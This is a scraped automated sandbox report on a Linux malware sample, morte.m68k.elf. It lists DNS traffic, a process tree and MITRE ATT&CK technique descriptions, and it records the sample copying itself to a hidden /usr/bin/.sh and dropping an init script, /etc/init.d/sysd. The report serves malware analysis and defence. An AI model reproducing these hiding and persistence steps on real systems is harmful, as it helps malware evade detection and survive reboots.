Jul 6, 2025 08:13:21.388070107 CEST	37753	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:21.473882914 CEST	53	37753	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:21.475054026 CEST	32888	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:21.560895920 CEST	53	32888	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:21.561675072 CEST	52678	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:21.648142099 CEST	53	52678	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:21.649508953 CEST	33686	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:21.735454082 CEST	53	33686	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:35.389496088 CEST	43110	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:35.474920988 CEST	53	43110	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:35.476476908 CEST	51650	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:35.562000990 CEST	53	51650	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:35.562808990 CEST	45386	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:35.648606062 CEST	53	45386	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:35.649583101 CEST	43267	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:35.735261917 CEST	53	43267	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:35.736156940 CEST	53260	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:35.821943998 CEST	53	53260	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:49.121637106 CEST	55550	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:49.207500935 CEST	53	55550	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:49.209078074 CEST	45209	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:49.294944048 CEST	53	45209	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:49.296214104 CEST	49995	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:49.381907940 CEST	53	49995	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:49.383388042 CEST	43418	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:49.469122887 CEST	53	43418	8.8.8.8	192.168.2.14
Jul 6, 2025 08:13:49.470480919 CEST	53133	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:13:49.556329966 CEST	53	53133	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:02.716665983 CEST	44421	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:02.802572012 CEST	53	44421	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:02.803256989 CEST	40668	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:02.888670921 CEST	53	40668	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:02.889381886 CEST	34053	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:02.974833012 CEST	53	34053	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:02.975414038 CEST	55223	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:03.061444044 CEST	53	55223	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:03.061965942 CEST	44347	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:03.147597075 CEST	53	44347	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:16.383450031 CEST	58306	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:16.468980074 CEST	53	58306	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:16.470083952 CEST	40508	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:16.556288958 CEST	53	40508	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:16.557069063 CEST	38485	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:16.642971039 CEST	53	38485	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:16.643788099 CEST	53916	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:16.729557037 CEST	53	53916	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:16.730823994 CEST	48105	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:16.816535950 CEST	53	48105	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:29.766387939 CEST	34899	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:29.852514029 CEST	53	34899	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:29.853967905 CEST	39663	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:29.939434052 CEST	53	39663	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:29.940860987 CEST	38955	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:30.026381969 CEST	53	38955	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:30.027741909 CEST	54314	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:30.113202095 CEST	53	54314	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:30.114444971 CEST	41387	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:30.200620890 CEST	53	41387	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:43.164274931 CEST	36770	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:43.249952078 CEST	53	36770	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:43.251374006 CEST	34337	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:43.337857962 CEST	53	34337	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:43.338990927 CEST	46244	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:43.424767017 CEST	53	46244	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:43.426299095 CEST	51568	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:43.512186050 CEST	53	51568	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:43.513405085 CEST	60003	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:43.598851919 CEST	53	60003	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:56.579605103 CEST	38354	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:56.665901899 CEST	53	38354	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:56.667258024 CEST	54361	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:56.753030062 CEST	53	54361	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:56.753988981 CEST	52245	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:56.839896917 CEST	53	52245	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:56.841397047 CEST	54198	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:56.926721096 CEST	53	54198	8.8.8.8	192.168.2.14
Jul 6, 2025 08:14:56.928102016 CEST	57445	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:14:57.013566971 CEST	53	57445	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:09.961832047 CEST	59856	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:10.047307014 CEST	53	59856	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:10.047866106 CEST	37334	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:10.133253098 CEST	53	37334	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:10.133829117 CEST	39196	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:10.219244003 CEST	53	39196	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:10.220024109 CEST	33289	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:10.305965900 CEST	53	33289	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:10.306509018 CEST	33277	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:10.392043114 CEST	53	33277	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:24.065314054 CEST	45356	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:24.151284933 CEST	53	45356	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:24.152741909 CEST	59411	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:24.238432884 CEST	53	59411	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:24.239921093 CEST	51803	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:24.325480938 CEST	53	51803	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:24.327040911 CEST	49865	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:24.412851095 CEST	53	49865	8.8.8.8	192.168.2.14
Jul 6, 2025 08:15:24.414628983 CEST	44221	53	192.168.2.14	8.8.8.8
Jul 6, 2025 08:15:24.500478029 CEST	53	44221	8.8.8.8	192.168.2.14

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 6, 2025 08:13:05.348021984 CEST	192.168.2.14	192.168.2.1	827a	(Port unreachable)	Destination Unreachable
Jul 6, 2025 08:14:25.358831882 CEST	192.168.2.14	192.168.2.1	827a	(Port unreachable)	Destination Unreachable

System Behavior

Analysis Process: morte.m68k.elf PID: 5804, Parent PID: 5722

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	/tmp/morte.m68k.elf
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5806, Parent PID: 5804

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5808, Parent PID: 5806

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5817, Parent PID: 5808

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 5817, Parent PID: 5808

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/bin/sh
Arguments:	sh -c "cp /tmp/morte.m68k.elf /usr/bin/.sh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5822, Parent PID: 5817

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5822, Parent PID: 5817

General

Start time (UTC):	06:12:55
Start date (UTC):	06/07/2025
Path:	/usr/bin/cp
Arguments:	cp /tmp/morte.m68k.elf /usr/bin/.sh
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5825, Parent PID: 5808

General

Start time (UTC):	06:12:56
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5827, Parent PID: 5825

General

Start time (UTC):	06:12:56
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5829, Parent PID: 5825

General

Start time (UTC):	06:12:56
Start date (UTC):	06/07/2025
Path:	/tmp/morte.m68k.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: gvfsd-fuse PID: 5836, Parent PID: 3147

General

Start time (UTC):	06:13:02
Start date (UTC):	06/07/2025
Path:	/usr/libexec/gvfsd-fuse
Arguments:	-
File size:	47632 bytes
MD5 hash:	d18fbf1cbf8eb57b17fac48b7b4be933

Chronological Activities

Analysis Process: fusermount PID: 5836, Parent PID: 3147

General

Start time (UTC):	06:13:02
Start date (UTC):	06/07/2025
Path:	/bin/fusermount
Arguments:	fusermount -u -q -z -- /run/user/1000/gvfs
File size:	39144 bytes
MD5 hash:	576a1b135c82bdcbc97a91acea900566

Chronological Activities

Analysis Process: python3.8 PID: 5838, Parent PID: 5835

General

Start time (UTC):	06:13:02
Start date (UTC):	06/07/2025
Path:	/usr/bin/python3.8
Arguments:	-
File size:	5490352 bytes
MD5 hash:	69f442c3e33b5f9a66b722c29ad89435

Chronological Activities

Analysis Process: gdbus PID: 5838, Parent PID: 5835

General

Start time (UTC):	06:13:02
Start date (UTC):	06/07/2025
Path:	/usr/bin/gdbus
Arguments:	/usr/bin/gdbus call -e -d org.gnome.SessionManager -o /org/gnome/SessionManager -m org.gnome.SessionManager.IsSessionRunning
File size:	51592 bytes
MD5 hash:	1deb65de9f7f468799d3bfde20118a9b

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report morte.m68k.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/init.d/sysd

/tmp/qemu-open.eQr1qp (deleted)

/usr/bin/.sh

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

System Behavior

Analysis Process: morte.m68k.elf PID: 5804, Parent PID: 5722

General

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5806, Parent PID: 5804

General

Chronological Activities

Analysis Process: morte.m68k.elf PID: 5808, Parent PID: 5806

General

Chronological Activities

Linux Analysis Report
morte.m68k.elf